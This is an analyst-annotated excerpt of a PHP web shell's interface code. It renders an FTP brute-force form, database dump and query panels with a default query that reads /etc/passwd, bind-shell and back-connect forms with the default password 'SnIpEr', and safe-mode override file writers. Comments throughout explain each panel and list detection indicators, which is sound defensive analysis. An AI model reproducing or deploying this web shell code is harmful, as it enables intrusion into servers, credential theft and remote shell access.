  2758. echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):(""))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
  2759. echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
  2760. echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
  2761. echo $te.'</div>'.$table_end1.$fe;
  2762. }
  // Database panel, rendered when at least one of $mysql_on/$mssql_on/$pg_on/
  // $ora_on is set (all assigned outside this view). Two side-by-side forms
  // share the same engine <select name=db> and connection fields:
  //   left:  cmd=mysql_dump  db, db_server, db_port, mysql_l, mysql_p,
  //                          mysql_db, mysql_tbl, dif, dif_name ("dump.sql")
  //   right: cmd=db_query    db, db_server, db_port, mysql_l, mysql_p,
  //                          mysql_db, db_query
  // Analyst notes:
  //  - The login and password are plain text inputs pre-filled from the previous
  //    POST, so submitted database credentials come back in the response body.
  //  - db_port defaults to 3306 whichever engine is selected.
  //  - $_POST['db_query'] is concatenated into the textarea without escaping.
  //  - The default query text is a fixed literal (table name "thesunofvn",
  //    a commented-out LOAD DATA LOCAL INFILE of /etc/passwd); useful as a
  //    content indicator for this paste.
  // Detection: database logins from the web host using accounts the application
  // does not normally use, and LOAD DATA LOCAL INFILE statements in query logs.
  2763. if($mysql_on||$mssql_on||$pg_on||$ora_on)
  2764. {
  2765. $select = '<select name=db>';
  2766. if($mysql_on) $select .= '<option>MySQL</option>';
  2767. if($mssql_on) $select .= '<option>MSSQL</option>';
  2768. if($pg_on)    $select .= '<option>PostgreSQL</option>';
  2769. if($ora_on)   $select .= '<option>Oracle</option>';
  2770. $select .= '</select>';
  2771. echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
  2772. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
  2773. echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
  2774. echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
  2775. echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):(""))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):(""))));
  2776. echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):(""))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):(""))));
  2777. echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
  2778. echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
  2779. echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
  2780. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
  2781. echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
  2782. echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
  2783. echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):(""))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):(""))));
  2784. echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):(""))));
  2785. echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
  2786. echo $te."<div align=center id='n'><textarea cols=75 rows=2 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\r\n#create table thesunofvn (mt varchar(1024));\r\n#load data local infile '/etc/passwd' into table thesunofvn;\r\n#update table set column='value what you want' where column=number;\r\n#insert table ('column','column') VALUES (number,'value');"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
  2787. }
  // Network panel, rendered when $unix is set. Two forms with no hidden `cmd`;
  // the labels come from $lang (not visible), so the roles below are read from
  // the field names and should be confirmed against the handlers:
  //   left:  port (default 9999), bind_pass (default 'SnIpEr'), use = Perl | C
  //          -- appears to configure a listening shell on the host
  //   right: ip (default: requester's REMOTE_ADDR, else 127.0.0.1),
  //          port (default 80), use = Perl | C
  //          -- appears to configure an outbound connection to the operator
  // Both forms reuse the field names `port` and `use`.
  // Indicators and detection: the literal defaults 9999 and 'SnIpEr' are stable
  // strings in this paste; at runtime look for listening sockets or outbound
  // TCP sessions owned by the web-server user, and for perl or compiler
  // processes spawned by it.
  2788. if($unix){
  2789. echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
  2790. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
  2791. echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'9999'));
  2792. echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'SnIpEr'));
  2793. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
  2794. echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
  2795. echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
  2796. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
  2797. echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
  2798. echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'80'));
  2799. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
  2800. echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
  2801. echo $te."</td>".$fe."</tr></div></table>";
  2802. }
  // Rendered only when $safe_mode is set (assigned outside this view). Three
  // single-field rows, each with its own submit button and no hidden `cmd`:
  //   php_ini1 (default 'php.ini'), htacces (default 'htaccess'),
  //   file_ini (default 'ini.php')
  // The field names and defaults suggest the handler writes per-directory
  // configuration override files; that code is not visible here -- confirm.
  // Detection: file-integrity alerts on php.ini, .htaccess or ini.php appearing
  // or changing inside web-served directories.
  // NOTE(review): the three rows sit inside one table cell and nothing in this
  // view opens a separate form per row, so which field is acted on presumably
  // depends on the handler.
  2803. if($safe_mode)
  2804. {
  2805. echo $table_up1.div_title($lang[$language.'_text211'],'id211').$table_up2.div('id211').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
  2806. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text212']."</div></b></font>";
  2807. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','php_ini1',10,'php.ini').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
  2808. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text213']."</div></b></font>";
  2809. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','htacces',10,'htaccess').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
  2810. echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text218']."</div></b></font>";
  2811. echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>",in('text','file_ini',10,'ini.php').ws(4).in('submit','submit',0,$lang[$language.'_butt65']));
  2812. echo $te.'</div>'.$table_end1.$fe;
  2813. }
  2814. echo '</table>'.$table_up3."</table>";
  2815. ?>
  2816. <html><body><center>
  2817. <div align=center id='n'><font face="Tahoma" size=3 color=red><b>_____<a href="https://www.facebook.com/Party.Marion001" target="_blank"><b>Marion001</b></a><br/></font></div>
  2818. <b><font face="Tahoma" size=-1 color="white">Generation time:</font></b> <font color="red" size=2><b><? echo round(getmicrotime()-starttime,4); ?></b></font> <font face="Tahoma" size=-1 color="white"><b>seconds</b></font>
  2819. </center></body></html>